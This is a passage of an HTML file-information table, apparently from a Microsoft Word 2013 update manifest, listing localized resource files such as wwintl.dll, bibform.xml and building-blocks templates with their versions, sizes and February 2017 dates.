dll_1040</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1027264</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1041</td><td>bibform.xml</td><td>\u00a0</td><td>97202</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_1041</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1084088</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1041</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1084088</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1041</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1084088</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1087</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1104576</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1087</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1104576</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1087</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1104576</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1042</td><td>bibform.xml</td><td>\u00a0</td><td>97630</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1042</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1083584</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1042</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1083584</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1042</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1083584</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1063</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1085632</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1063</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1085632</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1063</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1085632</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1062</td><td>bibform.xml</td><td>\u00a0</td><td>114514</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1062</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1061560</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1062</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1061560</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1062</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1061560</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1086</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>949952</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1086</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>949952</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1086</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>949952</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1044</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>994488</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1044</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>994488</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1044</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>994488</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1043</td><td>bibform.xml</td><td>\u00a0</td><td>113208</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1043</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1011904</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1043</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1011904</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1043</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1011904</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1045</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1123512</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1045</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1123512</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1045</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1123512</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1046</td><td>bibform.xml</td><td>\u00a0</td><td>111828</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1046</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1029304</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1046</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1029304</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1046</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1029304</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_2070</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1042616</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_2070</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1042616</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_2070</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1042616</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1048</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1164480</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1048</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1164480</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1048</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1164480</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1049</td><td>bibform.xml</td><td>\u00a0</td><td>112712</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1049</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1049792</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1049</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1049792</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1049</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1049792</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1051</td><td>bibform.xml</td><td>\u00a0</td><td>111034</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1051</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1162944</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1051</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1162944</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1051</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1162944</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1060</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1050304</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1060</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1050304</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1060</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1050304</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_2074</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1083072</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_2074</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1083072</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_2074</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1083072</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1053</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>992440</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1053</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>992440</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1053</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>992440</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1054</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1012928</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1054</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1012928</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1054</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1012928</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1055</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1120448</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1055</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1120448</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1055</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1120448</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1058</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1056440</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1058</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1056440</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1058</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1056440</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1066</td><td>bibform.xml</td><td>\u00a0</td><td>113620</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1066</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1152704</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1066</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1152704</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1066</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1152704</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_2052</td><td>bibform.xml</td><td>\u00a0</td><td>96830</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_2052</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>902848</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_2052</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>902848</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_2052</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>902848</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1028</td><td>bibform.xml</td><td>\u00a0</td><td>96804</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1028</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>916664</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1028</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>916664</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1028</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>916664</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>document_parts.dot_1025</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3633666</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1026</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3637449</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1029</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3618985</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1030</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3608062</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1031</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3603386</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1032</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3653167</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_3082</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3612006</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1061</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604130</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1035</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3603428</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1036</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3619560</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1037</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3629591</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1081</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3644334</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1050</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3607442</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1038</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604785</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1057</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609041</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1040</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3599032</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1041</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3636899</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1087</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3634700</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1042</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3628333</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1063</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3622044</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1062</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3611384</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1086</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604931</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1044</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3608018</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1043</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3601853</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1045</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609394</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1046</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617732</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_2070</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3613701</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1048</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617400</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1049</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3646588</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1051</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3613567</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1060</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604721</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_2074</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617809</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1053</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609521</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1054</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3653990</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1055</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3607036</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1058</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3649803</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1066</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3631479</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_2052</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3615970</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>document_parts.dot_1028</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3627311</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wordicon.exe</td><td>wordicon.exe</td><td>15.0.4553.1000</td><td>3015336</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>pdfreflow.exe</td><td>pdfreflow.exe</td><td>15.0.4909.1000</td><td>14038744</td><td>23-Feb-17</td><td>04:30</td></tr><tr><td>wwintl.dll.idx_dll_1025</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1025</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>526016</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1026</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1026</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>533696</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1029</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1029</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>630976</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1030</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1030</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>611496</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1031</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1031</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>624832</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1032</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115912</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1032</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1033</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117504</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wwintl.rest.idx_dll_1033</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1501</td><td>628424</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wwintl.dll.idx_dll_3082</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_3082</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>630464</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1061</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1061</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1035</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1035</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>621224</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1036</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1036</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>628416</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1037</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1037</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>520360</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1081</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1081</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>524480</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1050</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118984</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1050</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>625832</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1038</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116416</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1038</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>623808</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1057</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1057</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>531136</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1040</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1040</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>620712</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1041</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1041</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>496296</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1087</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>113352</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1087</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>525504</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1042</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>113344</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1042</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>511680</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1063</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1063</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>522408</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1062</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118976</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1062</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>532672</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1086</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1086</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>530112</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1044</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1044</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>614056</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1043</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114888</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1043</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>625856</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1045</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1045</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1046</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118464</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1046</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>637120</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_2070</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118464</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_2070</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>637632</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1048</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1048</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>618664</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1049</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1049</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>514728</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1051</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117448</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1051</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>631488</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1060</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1060</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>612520</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_2074</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_2074</td><td>wwintl.rest.idx_dll</t